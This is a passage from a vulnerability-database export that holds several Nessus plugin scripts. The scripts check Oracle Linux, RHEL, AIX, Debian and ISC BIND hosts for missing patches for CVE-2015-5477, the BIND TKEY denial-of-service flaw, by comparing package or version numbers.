value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"Oracle Linux 5 : bind (ELSA-2015-1514)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1514 :\n\nUpdated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005224.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", 
reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:17", "description": "Updated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 5 : bind97 (RHSA-2015:1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind97", "p-cpe:/a:redhat:enterprise_linux:bind97-chroot", "p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind97-devel", "p-cpe:/a:redhat:enterprise_linux:bind97-libs", "p-cpe:/a:redhat:enterprise_linux:bind97-utils", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85070", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1515. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85070);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"RHEL 5 : bind97 (RHSA-2015:1515)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1515\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) 
flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:39", "description": "According to its self-reported version number, the installation of ISC BIND on the remote name server is potentially affected by a denial of service vulnerability due to a REQUIRE assertion flaw that occurs while handling TKEY queries. 
A remote attacker can exploit this by using a specially crafted TKEY query to crash the daemon.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-05T00:00:00", "type": "nessus", "title": "ISC BIND 9.7.x < 9.9.7-P2 / 9.10.x < 9.10.2-P3 TKEY Query Handling Remote DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:isc:bind"], "id": "BIND9_9102_P3.NASL", "href": "https://www.tenable.com/plugins/nessus/85241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85241);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"EDB-ID\", value:\"37721\");\n\n script_name(english:\"ISC BIND 9.7.x < 9.9.7-P2 / 9.10.x < 9.10.2-P3 TKEY Query Handling Remote DoS\");\n script_summary(english:\"Checks the version of BIND.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote name server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the installation of\nISC BIND on the remote name server is potentially affected by a denial\nof service vulnerability due to a REQUIRE assertion flaw that occurs\nwhile handling TKEY queries. 
A remote attacker can exploit this by\nusing a specially crafted TKEY query to crash the daemon.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01272\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.isc.org/article/AA-01280\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to BIND version 9.9.7-P2 / 9.10.2-P3 or later, or apply the\npatch referenced in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"bind_version.nasl\");\n script_require_keys(\"bind/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = 
get_kb_item_or_exit(\"bind/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID); # patch can be applied\n\nfix = '';\n\n# 9.1.0 through BIND 9.9.7-P1 and BIND 9.10.2-P2 are vulnerable\nif (\n ver =~ \"^9\\.[1-8]([^0-9]|$)\" ||\n ver =~ \"^9\\.9\\.[0-6]([^0-9]|$)\" ||\n ver =~ \"^9\\.9\\.7($|([ab][12]|rc[12]|-P1)$)\"\n) fix = '9.9.7-P2';\n\nif (\n ver =~ \"^9\\.10\\.[01]([^0-9]|$)\" ||\n ver =~ \"^9\\.10\\.2($|([ab][12]|rc[12]|-P[12])$)\"\n) fix = '9.10.2-P3';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:53, proto:\"udp\", extra:report);\n }\n else security_hole(port:53, proto:\"udp\");\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"BIND\", 53, ver, \"UDP\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:40", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. 
By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 9 : bind9 (IV75692)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV75692.NASL", "href": "https://www.tenable.com/plugins/nessus/85415", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85415);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 6.1 TL 9 : bind9 (IV75692)\");\n script_summary(english:\"Check for APAR IV75692\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. 
By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"05\", patch:\"IV75692s5a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.9.45\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:38", "description": "Jonathan Foote discovered that the BIND DNS server does not properly handle TKEY queries. A remote attacker can take advantage of this flaw to mount a denial of service via a specially crafted query triggering an assertion failure and causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Debian DSA-3319-1 : bind9 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bind9", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3319.NASL", "href": "https://www.tenable.com/plugins/nessus/85053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3319. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85053);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"DSA\", value:\"3319\");\n\n script_name(english:\"Debian DSA-3319-1 : bind9 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=793903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bind9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bind9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bind9 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bind9\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9-doc\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9-host\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9utils\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"dnsutils\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"host\", 
